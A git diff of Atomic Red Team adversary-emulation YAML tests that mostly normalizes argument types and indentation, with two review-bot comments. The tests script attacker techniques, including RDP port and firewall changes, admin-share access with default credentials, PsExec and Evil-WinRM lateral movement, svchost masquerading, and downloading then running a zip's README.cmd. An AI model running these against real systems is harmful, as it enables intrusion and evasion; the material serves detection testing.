@@ -48,15 +48,15 @@ atomic_tests: description: | Changing RDP Port to Non Standard Port via Powershell supported_platforms: - - windows + - windows input_arguments: OLD_Remote_Port: description: Default RDP Listening Port - type: String + type: string default: "3389" NEW_Remote_Port: description: New RDP Listening Port - type: String + type: string default: "4489" executor: command: |
@@ -66,21 +66,21 @@ atomic_tests: Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "PortNumber" -Value #{OLD_Remote_Port} Remove-NetFirewallRule -DisplayName "RDPPORTLatest-TCP-In" -ErrorAction ignore name: powershell - elevation_required: true + elevation_required: true - name: Changing RDP Port to Non Standard Port via Command_Prompt auto_generated_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 description: | Changing RDP Port to Non Standard Port via Command_Prompt supported_platforms: - - windows + - windows input_arguments: OLD_Remote_Port: description: Default RDP Listening Port - type: String + type: string default: "3389" NEW_Remote_Port: description: New RDP Listening Port - type: String + type: string default: "4489" executor: command: |
@@ -90,4 +90,4 @@ atomic_tests: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d #{OLD_Remote_Port} -f >nul 2>&1 netsh advfirewall firewall delete rule name="RDPPORTLatest-TCP-In" >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1021.002/T1021.002.yaml b/atomics/T1021.002/T1021.002.yaml index aae1b061..7b2d71ab 100644 --- a/atomics/T1021.002/T1021.002.yaml +++ b/atomics/T1021.002/T1021.002.yaml @@ -10,19 +10,19 @@ atomic_tests: input_arguments: user_name: description: Username - type: String + type: string default: DOMAIN\Administrator share_name: description: Examples C$, IPC$, Admin$ - type: String + type: string default: C$ password: description: Password - type: String + type: string default: P@ssw0rd1 computer_name: description: Target Computer Name - type: String + type: string default: Target executor: command: | @@ -37,15 +37,15 @@ atomic_tests: input_arguments: share_name: description: Examples C$, IPC$, Admin$ - type: String + type: string default: C$ map_name: description: Mapped Drive Letter - type: String + type: string default: g computer_name: description: Target Computer Name - type: String + type: string default: Target executor: command: | @@ -60,11 +60,11 @@ atomic_tests: input_arguments: command_path: description: File to copy and execute - type: Path + type: path default: C:\Windows\System32\cmd.exe remote_host: description: Remote computer to receive the copy and execute the file - type: String + type: string default: '\\localhost' psexec_exe: description: Path to PsExec 
@@ -96,16 +96,14 @@ atomic_tests: input_arguments: output_file: description: Remote computer to receive the copy and execute the file - type: String + type: string default: output.txt command_to_execute: description: Command to execute for output. - type: String + type: string default: hostname executor: command: | cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1 name: command_prompt elevation_required: true - - diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml index 69b11217..233c88eb 100644 --- a/atomics/T1021.003/T1021.003.yaml +++ b/atomics/T1021.003/T1021.003.yaml @@ -16,7 +16,7 @@ atomic_tests: input_arguments: computer_name: description: Name of Computer - type: String + type: string default: localhost executor: command: | diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml index 130f6f96..0bc77ab6 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml @@ -28,7 +28,7 @@ atomic_tests: Invoke-Command -ComputerName $env:COMPUTERNAME -ScriptBlock {whoami} cleanup_command: Disable-PSRemoting -Force name: powershell - + - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled @@ -37,15 +37,15 @@ atomic_tests: input_arguments: user_name: description: Username - type: String + type: string default: Domain\Administrator destination_address: description: Remote Host IP or Hostname - type: String + type: string default: Target password: description: Password - type: String + type: string default: P@ssw0rd1 dependency_executor_name: powershell dependencies: diff --git a/atomics/T1027.001/T1027.001.yaml b/atomics/T1027.001/T1027.001.yaml index 73fc36d9..a84f631e 100644 --- a/atomics/T1027.001/T1027.001.yaml +++ b/atomics/T1027.001/T1027.001.yaml 
@@ -13,7 +13,7 @@ atomic_tests: input_arguments: file_to_pad: description: Path of binary to be padded - type: Path + type: path default: /tmp/evil-binary dependency_executor_name: bash dependencies: @@ -29,4 +29,3 @@ atomic_tests: cleanup_command: | rm #{file_to_pad} name: sh - diff --git a/atomics/T1027.002/T1027.002.yaml b/atomics/T1027.002/T1027.002.yaml index f394bf9d..a891d849 100644 --- a/atomics/T1027.002/T1027.002.yaml +++ b/atomics/T1027.002/T1027.002.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx executor: command: | @@ -31,7 +31,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/linux/test_upx_header_changed executor: command: | @@ -49,7 +49,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx executor: command: | @@ -69,7 +69,7 @@ atomic_tests: input_arguments: bin_path: description: Packed binary - type: Path + type: path default: PathToAtomicsFolder/T1027.002/bin/darwin/test_upx_header_changed executor: command: | @@ -77,4 +77,3 @@ atomic_tests: cleanup_command: | rm /tmp/packed_bin name: sh - diff --git a/atomics/T1027.004/T1027.004.yaml b/atomics/T1027.004/T1027.004.yaml index 7a7ba521..45edd715 100644 --- a/atomics/T1027.004/T1027.004.yaml +++ b/atomics/T1027.004/T1027.004.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: output_file: description: Output compiled binary - type: Path + type: path default: C:\Windows\Temp\T1027.004.exe input_file: description: C# code that launches calc.exe from a hidden cmd.exe Window - type: Path + type: path default: PathToAtomicsFolder\T1027.004\src\calc.cs dependency_executor_name: powershell dependencies: 
@@ -44,7 +44,7 @@ atomic_tests: input_arguments: input_file: description: exe program containing dynamically compiled C# code - type: Path + type: path default: PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe dependency_executor_name: powershell dependencies: @@ -69,7 +69,7 @@ atomic_tests: input_arguments: input_file: description: source file - type: Path + type: path default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.c dependency_executor_name: sh dependencies: @@ -94,7 +94,7 @@ atomic_tests: input_arguments: input_file: description: source file - type: Path + type: path default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.cc dependency_executor_name: sh dependencies: @@ -119,7 +119,7 @@ atomic_tests: input_arguments: input_file: description: source file - type: Path + type: path default: PathToAtomicsFolder/T1027.004/src/T1027-004-test.go dependency_executor_name: sh dependencies: @@ -133,4 +133,3 @@ atomic_tests: command: | go run #{input_file} name: bash - diff --git a/atomics/T1027/T1027.yaml b/atomics/T1027/T1027.yaml index f452da1b..0ca57c64 100644 --- a/atomics/T1027/T1027.yaml +++ b/atomics/T1027/T1027.yaml @@ -14,7 +14,7 @@ atomic_tests: input_arguments: shell_command: description: command to encode - type: String + type: string default: "echo Hello from the Atomic Red Team && uname -v" dependency_executor_name: sh dependencies: @@ -44,7 +44,7 @@ atomic_tests: input_arguments: powershell_command: description: PowerShell command to encode - type: String + type: string default: Write-Host "Hey, Atomic!" executor: command: | 
@@ -65,15 +65,15 @@ atomic_tests: input_arguments: registry_key_storage: description: Windows Registry Key to store code - type: String + type: string default: HKCU:Software\Microsoft\Windows\CurrentVersion powershell_command: description: PowerShell command to encode - type: String + type: string default: Write-Host "Hey, Atomic!" registry_entry_storage: description: Windows Registry entry to store code under key - type: String + type: string default: Debug executor: command: | @@ -96,7 +96,7 @@ atomic_tests: input_arguments: url_path: description: url to download Exe - type: Url + type: url default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip dependency_executor_name: powershell dependencies: @@ -126,19 +126,19 @@ atomic_tests: input_arguments: input_file: description: Path of the XLSM file - type: Path + type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm sender: description: sender email - type: String + type: string default: test@corp.com receiver: description: receiver email - type: String + type: string default: test@corp.com smtp_server: description: SMTP Server IP Address - type: String + type: string default: 127.0.0.1 executor: command: | @@ -154,11 +154,11 @@ atomic_tests: input_arguments: input_file: description: Path of the XLSM file - type: Path + type: path default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm ip_address: description: Destination IP address - type: String + type: string default: 127.0.0.1 executor: command: | @@ -185,11 +185,11 @@ atomic_tests: input_arguments: remote_file: description: URL of file to download - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path/filename to save the dowloaded file to - type: Path + type: path default: Atomic-license.txt executor: steps: | diff --git a/atomics/T1030/T1030.yaml b/atomics/T1030/T1030.yaml index 8397774c..1497fb07 100644 
--- a/atomics/T1030/T1030.yaml +++ b/atomics/T1030/T1030.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: file_name: description: File name - type: Path + type: path default: T1030_urandom folder_path: description: Path where the test creates artifacts - type: Path + type: path default: /tmp/T1030 dependency_executor_name: sh dependencies: @@ -31,4 +31,3 @@ atomic_tests: cleanup_command: | if [ -f #{folder_path}/safe_to_delete ]; then rm -rf #{folder_path}; fi; name: sh - diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index b7889c4b..7cff4e22 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: computer_name: description: Name of remote computer - type: String + type: string default: localhost executor: command: | diff --git a/atomics/T1036.003/T1036.003.yaml b/atomics/T1036.003/T1036.003.yaml index e417bce5..3f2e104c 100644 --- a/atomics/T1036.003/T1036.003.yaml +++ b/atomics/T1036.003/T1036.003.yaml @@ -87,11 +87,11 @@ atomic_tests: input_arguments: outputfile: description: path of file to execute - type: Path + type: path default: ($env:TEMP + "\svchost.exe") inputfile: description: path of file to copy - type: Path + type: path default: PathToAtomicsFolder\T1036.003\bin\T1036.003.exe dependency_executor_name: powershell dependencies: @@ -119,11 +119,11 @@ atomic_tests: input_arguments: outputfile: description: path of file to execute - type: Path + type: path default: ($env:TEMP + "\svchost.exe") inputfile: description: path of file to copy - type: Path + type: path default: $env:ComSpec executor: command: | 
@@ -162,32 +162,32 @@ atomic_tests: input_arguments: exe_path: description: path to exe to use when creating masquerading files - type: Path + type: path default: C:\Windows\System32\calc.exe vbs_path: description: path of vbs to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.vbs ps1_path: description: path of powershell script to use when creating masquerading files - type: Path + type: path default: PathToAtomicsFolder\T1036.003\src\T1036.003_masquerading.ps1 dependency_executor_name: powershell dependencies: - - description: | - File to copy must exist on disk at specified location (#{vbs_path}) - prereq_command: | - if (Test-Path #{vbs_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}" - - description: | - File to copy must exist on disk at specified location (#{ps1_path}) - prereq_command: | - if (Test-Path #{ps1_path}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}" + - description: | + File to copy must exist on disk at specified location (#{vbs_path}) + prereq_command: | + if (Test-Path #{vbs_path}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{vbs_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.vbs" -OutFile "#{vbs_path}" + - description: | + File to copy must exist on disk at specified location (#{ps1_path}) + prereq_command: | + if (Test-Path #{ps1_path}) 
{exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{ps1_path}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/src/T1036.003_masquerading.ps1" -OutFile "#{ps1_path}" executor: command: | copy #{exe_path} %temp%\T1036.003_masquerading.docx.exe /Y @@ -219,4 +219,3 @@ atomic_tests: del /f %temp%\T1036.003_masquerading.pdf.ps1 > nul 2>&1 del /f %temp%\T1036.003_masquerading.rtf.ps1 > nul 2>&1 name: command_prompt - diff --git a/atomics/T1036.005/T1036.005.yaml b/atomics/T1036.005/T1036.005.yaml index 99b00201..e8b05be4 100644 --- a/atomics/T1036.005/T1036.005.yaml +++ b/atomics/T1036.005/T1036.005.yaml @@ -6,12 +6,12 @@ atomic_tests: description: | Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) supported_platforms: - - macos - - linux + - macos + - linux input_arguments: test_message: description: Test message to echo out to the screen - type: String + type: string default: Hello from the Atomic Red Team test T1036.005#1 executor: name: sh @@ -32,7 +32,7 @@ atomic_tests: input_arguments: executable_filepath: description: File path where the generated executable will be dropped and executed from. The filename should be the name of a built-in system utility. - type: String + type: string default: $Env:windir\Temp\svchost.exe executor: command: | @@ -43,7 +43,7 @@ atomic_tests: } } '@ -OutputAssembly "#{executable_filepath}" - + Start-Process -FilePath "#{executable_filepath}" cleanup_command: | Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml index 31ef97aa..68a2f39f 100644 --- a/atomics/T1036/T1036.yaml +++ b/atomics/T1036/T1036.yaml 
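Review bot: In the T1036.005 `@@ -32,7 +32,7 @@` hunk, `executable_filepath` is normalized to `type: string` although its own description calls it a file path, while the analogous `outputfile`/`inputfile` arguments in T1036.003 are normalized to `type: path` in this same commit; `type: path` keeps the argument taxonomy consistent across the masquerading tests. The `Add-Type ... -OutputAssembly "#{executable_filepath}"` body that consumes it starts outside the hunk, so whether a pre-existing file at that path is overwritten or rejected is not visible here; the `Remove-Item -Path "#{executable_filepath}" -ErrorAction Ignore` cleanup suggests it is simply overwritten, which is worth stating in the description since the default drops a `svchost.exe` under `$Env:windir\Temp`.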
@@ -1,41 +1,41 @@ -attack_technique: T1036 -display_name: "Masquerading" -atomic_tests: -- name: System File Copied to Unusual Location - auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd - description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. - supported_platforms: - - windows - executor: - command: |- - copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe" - start-process "$env:allusersprofile\cmd.exe" - sleep -s 5 - stop-process -name "cmd" | out-null - cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue - name: powershell -- name: Malware Masquerading and Execution from Zip File - auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc - description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960) - supported_platforms: - - windows - input_arguments: - url: - description: Location of zip file - type: Url - default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip - dependencies: - - description: Zip file must be present. 
- prereq_command: | - if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url} - executor: - command: |- - Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force - cd $env:userprofile\Downloads\T1036 - cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null - cleanup_command: |- - taskkill /IM Calculator.exe /f >$null 2>$null - Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore - name: powershell +attack_technique: T1036 +display_name: "Masquerading" +atomic_tests: +- name: System File Copied to Unusual Location + auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd + description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory. + supported_platforms: + - windows + executor: + command: |- + copy-item "$env:windir\System32\cmd.exe" -destination "$env:allusersprofile\cmd.exe" + start-process "$env:allusersprofile\cmd.exe" + sleep -s 5 + stop-process -name "cmd" | out-null + cleanup_command: remove-item "$env:allusersprofile\cmd.exe" -force -erroraction silentlycontinue + name: powershell +- name: Malware Masquerading and Execution from Zip File + auto_generated_guid: 4449c89b-ec82-43a4-89c1-91e2f1abeecc + description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960) + supported_platforms: + - windows + input_arguments: + url: + description: Location of zip file + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip + dependencies: + - description: Zip file must be present. 
+ prereq_command: | + if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url} + executor: + command: |- + Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force + cd $env:userprofile\Downloads\T1036 + cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null + cleanup_command: |- + taskkill /IM Calculator.exe /f >$null 2>$null + Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore + name: powershell diff --git a/atomics/T1037.001/T1037.001.yaml b/atomics/T1037.001/T1037.001.yaml index 357280a8..11fa1994 100644 --- a/atomics/T1037.001/T1037.001.yaml +++ b/atomics/T1037.001/T1037.001.yaml @@ -11,11 +11,11 @@ atomic_tests: input_arguments: script_path: description: Path to .bat file - type: String + type: string default: '%temp%\art.bat' script_command: description: Command To Execute - type: String + type: string default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt executor: command: | @@ -25,4 +25,4 @@ atomic_tests: REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 del #{script_path} >nul 2>&1 del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 - name: command_prompt \ No newline at end of file + name: command_prompt diff --git a/atomics/T1039/T1039.yaml b/atomics/T1039/T1039.yaml index f712e13e..637e633b 100644 --- a/atomics/T1039/T1039.yaml +++ b/atomics/T1039/T1039.yaml @@ -1,5 +1,5 @@ attack_technique: T1039 -display_name: Data from Network Shared Drive +display_name: Data from Network Shared Drive atomic_tests: - name: Copy a sensitive File over Administive share with copy auto_generated_guid: 6ed67921-1774-44ba-bac6-adb51ed60660 
@@ -10,31 +10,31 @@ atomic_tests: - windows input_arguments: remote: - description: Remote server name + description: Remote server name type: string default: '127.0.0.1' share_file: description: Remote Path to the file - type: Path + type: path default: Windows\temp\Easter_Bunny.password local_file: description: Local name type: string - default: 'Easter_egg.password' + default: 'Easter_egg.password' dependency_executor_name: powershell dependencies: - - description: | - Administrative share must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} - get_prereq_command: | - Write-Host 'Please Enable "C$" share on #{remote}' - - description: | - "\\#{remote}\C$\#{share_file}" must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} - get_prereq_command: | - Out-File -FilePath "\\#{remote}\C$\#{share_file}" + - description: | + Administrative share must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} + get_prereq_command: | + Write-Host 'Please Enable "C$" share on #{remote}' + - description: | + "\\#{remote}\C$\#{share_file}" must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} + get_prereq_command: | + Out-File -FilePath "\\#{remote}\C$\#{share_file}" executor: command: |- copy \\#{remote}\C$\#{share_file} %TEMP%\#{local_file} 
@@ -52,31 +52,31 @@ atomic_tests: - windows input_arguments: remote: - description: Remote server name + description: Remote server name type: string default: '127.0.0.1' share_file: description: Remote Path to the file - type: Path + type: path default: Windows\temp\Easter_Bunny.password local_file: description: Local name type: string - default: 'Easter_egg.password' + default: 'Easter_egg.password' dependency_executor_name: powershell dependencies: - - description: | - Administrative share must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} - get_prereq_command: | - Write-Host 'Please Enable "C$" share on #{remote}' - - description: | - "\\#{remote}\C$\#{share_file}" must exist on #{remote} - prereq_command: | - if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} - get_prereq_command: | - Out-File -FilePath "\\#{remote}\C$\#{share_file}" + - description: | + Administrative share must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$") {exit 0} else {exit 1} + get_prereq_command: | + Write-Host 'Please Enable "C$" share on #{remote}' + - description: | + "\\#{remote}\C$\#{share_file}" must exist on #{remote} + prereq_command: | + if (Test-Path "\\#{remote}\C$\#{share_file}") {exit 0} else {exit 1} + get_prereq_command: | + Out-File -FilePath "\\#{remote}\C$\#{share_file}" executor: command: |- copy-item -Path "\\#{remote}\C$\#{share_file}" -Destination "$Env:TEMP\#{local_file}" @@ -84,4 +84,4 @@ atomic_tests: Remove-Item -Path "\\#{remote}\C$\#{share_file}" Remove-Item -Path "$Env:TEMP\#{local_file}" name: powershell - elevation_required: true + elevation_required: true diff --git a/atomics/T1040/T1040.yaml b/atomics/T1040/T1040.yaml index 7ffaf68b..0b7769eb 100644 --- a/atomics/T1040/T1040.yaml +++ b/atomics/T1040/T1040.yaml 
@@ -12,16 +12,16 @@ atomic_tests: input_arguments: interface: description: Specify interface to perform PCAP on. - type: String + type: string default: ens33 dependency_executor_name: bash dependencies: - - description: | - Check if at least one of tcpdump or tshark is installed. - prereq_command: | - if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - get_prereq_command: | - (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) + - description: | + Check if at least one of tcpdump or tshark is installed. + prereq_command: | + if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; + get_prereq_command: | + (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) executor: command: | tcpdump -c 5 -nnni #{interface} @@ -39,16 +39,16 @@ atomic_tests: input_arguments: interface: description: Specify interface to perform PCAP on. - type: String + type: string default: en0A dependency_executor_name: bash dependencies: - - description: | - Check if at least one of tcpdump or tshark is installed. - prereq_command: | - if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; - get_prereq_command: | - (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) + - description: | + Check if at least one of tcpdump or tshark is installed. + prereq_command: | + if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; + get_prereq_command: | + (which yum && yum -y install epel-release tcpdump tshark)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y tcpdump tshark) executor: command: | sudo tcpdump -c 5 -nnni #{interface} 
@@ -67,40 +67,38 @@ atomic_tests: input_arguments: interface: description: Specify interface to perform PCAP on. - type: String + type: string default: Ethernet wireshark_url: description: wireshark installer download URL - type: Url + type: url default: https://1.eu.dl.wireshark.org/win64/Wireshark-win64-latest.exe tshark_path: - description: path to tshark.exe - type: Path + description: path to tshark.exe + type: path default: c:\program files\wireshark\tshark.exe npcap_url: description: npcap installed download URL - type: Url + type: url default: https://nmap.org/npcap/dist/npcap-1.31.exe npcap_path: description: path to npcap.sys - type: Path + type: path default: C:\Program Files\Npcap\npcap.sys dependency_executor_name: powershell dependencies: - - description: | - tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". - prereq_command: - if (test-path "#{tshark_path}") {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} - Start-Process $env:temp\wireshark_installer.exe /S - - description: | - npcap must be installed. - prereq_command: - if (test-path "#{npcap_path}") {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} - Start-Process $env:temp\npcap_installer.exe + - description: | + tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". + prereq_command: if (test-path "#{tshark_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url} + Start-Process $env:temp\wireshark_installer.exe /S + - description: | + npcap must be installed. 
+ prereq_command: if (test-path "#{npcap_path}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile $env:temp\npcap_installer.exe #{npcap_url} + Start-Process $env:temp\npcap_installer.exe executor: command: | "c:\Program Files\Wireshark\tshark.exe" -i #{interface} -c 5 @@ -138,8 +136,8 @@ atomic_tests: cleanup_command: |- del %TEMP%\t1040.etl name: command_prompt - elevation_required: true - + elevation_required: true + - name: Windows Internal pktmon set filter auto_generated_guid: 855fb8b4-b8ab-4785-ae77-09f5df7bff55 description: |- @@ -163,24 +161,24 @@ atomic_tests: input_arguments: ifname: description: Specify interface to perform PCAP on. - type: String + type: string default: en0 csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_macos_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - exit 1 - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + exit 1 + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -i #{ifname} -t 3 
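Review bot: The rewritten T1040 Windows prereq block still downloads two installers and runs them with no integrity check — `Invoke-WebRequest -OutFile $env:temp\wireshark_installer.exe #{wireshark_url}` followed by `Start-Process $env:temp\wireshark_installer.exe /S`, with `wireshark_url` defaulting to an unpinned `Wireshark-win64-latest.exe` — so an elevated run trusts whatever the mirror serves that day. A practitioner would pin a release and gate execution on its hash, e.g. `if ((Get-FileHash "$env:temp\wireshark_installer.exe" -Algorithm SHA256).Hash -ne '<pinned-sha256>') { exit 1 }` before the `Start-Process`, and add `-Wait` to both `Start-Process` calls, since any `test-path` re-check of the prereq presumably runs while the installer is still extracting. The npcap `Start-Process` also lacks the `/S` its Wireshark twin has, so that install blocks on a GUI; whether the free npcap installer honours a silent switch at all should be verified rather than assumed. Separately, the executor hard-codes `"c:\Program Files\Wireshark\tshark.exe"` even though `tshark_path` is declared and checked by the prereq; `"#{tshark_path}" -i #{interface} -c 5` keeps the two in step.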
@@ -197,24 +195,24 @@ atomic_tests: input_arguments: ifname: description: Specify interface to perform PCAP on. - type: String + type: string default: en0 csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/macos_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_macos_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - exit 1 - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + exit 1 + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -f -i #{ifname} -t 3 @@ -231,20 +229,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -a -t 3 
@@ -261,20 +259,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -4 -p 6 -t 3 @@ -292,20 +290,20 @@ atomic_tests: input_arguments: csource_path: description: Path to C program source - type: String + type: string default: PathToAtomicsFolder/T1040/src/linux_pcapdemo.c program_path: description: Path to compiled C program - type: String + type: string default: /tmp/t1040_linux_pcapdemo dependency_executor_name: bash dependencies: - - description: | - compile C program - prereq_command: | - if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi - get_prereq_command: | - cc #{csource_path} -o #{program_path} + - description: | + compile C program + prereq_command: | + if [ -f "#{program_path}" ]; then exit 0; else exit 1; fi + get_prereq_command: | + cc #{csource_path} -o #{program_path} executor: command: | sudo #{program_path} -4 -P -p 17 -t 3 
